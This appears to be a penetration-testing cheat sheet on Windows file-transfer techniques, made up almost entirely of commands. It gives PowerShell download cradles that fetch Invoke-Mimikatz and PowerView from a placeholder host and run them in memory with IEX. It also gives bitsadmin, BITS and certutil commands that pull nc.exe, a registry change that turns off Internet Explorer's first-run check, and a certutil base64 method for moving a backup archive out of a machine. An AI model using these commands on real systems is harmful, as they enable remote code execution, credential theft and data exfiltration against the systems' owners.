#System.Net.WebClient class can be used to download a file over HTTP.
(New-Object System.Net.WebClient).DownloadFile('http://<IP>:PORT/file.EXT',"C:\Outfile.EXT")
#From PowerShell 3.0 Invoke-WebRequest but slower,
#Alias iwr, curl, wget can be used instead of Invoke-WebRequest
Invoke-WebRequest -uri http://<IP>:PORT/file.Ext -OutFile file.Ext
#Execute Payload directly into memory using Invoke-Expression
#Alias iex
IEX (New-Object Net-WebClient).DownloadString('http://<IP>:PORT/Invoke-Mimikatz.ps1')
#IEX also accepts pipeline input
Invoke-WebRequest https://<IP>:PORT/Invoke-Mimikatz.ps1 | iex
There may be cases when the Internet Explorer first-launch configuration has not been completed, which prevents the download.
This can be bypassed using the parameter -UseBasicParsing
Invoke-WebRequest https://<ip>/PowerView.ps1 | iex
Invoke-WebRequest : The response content cannot be parsed because the Internet Explorer engine is not available, or Internet Explorer's first-launch configuration is not complete. Specify the UseBasicParsing parameter and try again.
At line:1 char:1
+ Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/P ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotImplemented: (:) [Invoke-WebRequest], NotSupportedException
+ FullyQualifiedErrorId : WebCmdletIEDomNotSupportedException,Microsoft.PowerShell.Commands.InvokeWebRequestCommand
# FIX
Invoke-WebRequest https://<ip>/PowerView.ps1 -UseBasicParsing | iex
Invoke-CheckLocalAdminAccess
ComputerName IsAdmin
------------ -------
localhost False
# with administrative access to the machine, we can disable Internet Explorer’s First Run customization
reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main" /f /v DisableFirstRunCustomize /t REG_DWORD /d 2
Powershell download cradles that do not observe Internet Explorer’s first-run check can also be used. Harmj0y has compiled an extensive list of PowerShell download cradles here. It is worth gaining familiarity with them and their individual nuances, such as not observing a proxy or touching a disk to select the appropriate one for the situation.
#Background Intelligent Transfer Service
#Can download from HTTP sites and SMB shares
bitsadmin /transfer n http://<IP>/nc.exe C:\Temp\nc.exe
#PowerShell also enables interaction with BITS, enables file downloads and uploads, supports credentials, and can use specified proxy servers.
Import-Module bitstransfer;Start-BitsTransfer -Source "http://<IP>/nc.exe" -Destination "C:\Temp\nc.exe"
#available in all Windows versions
certutil.exe -encode C:\Users\Alfred\Downloads\backups\backup.zip c:\\windows\\temp\backup.b64
type c:\windows\temp #then copy and paste in your machine
vi backup.base64
base64 -d backup.base64 > backup.zip
#the Antimalware Scan Interface (AMSI) currently detects this as malicious certutil usage.
certutil.exe -verifyctl -split -f http://<IP>/nc.exe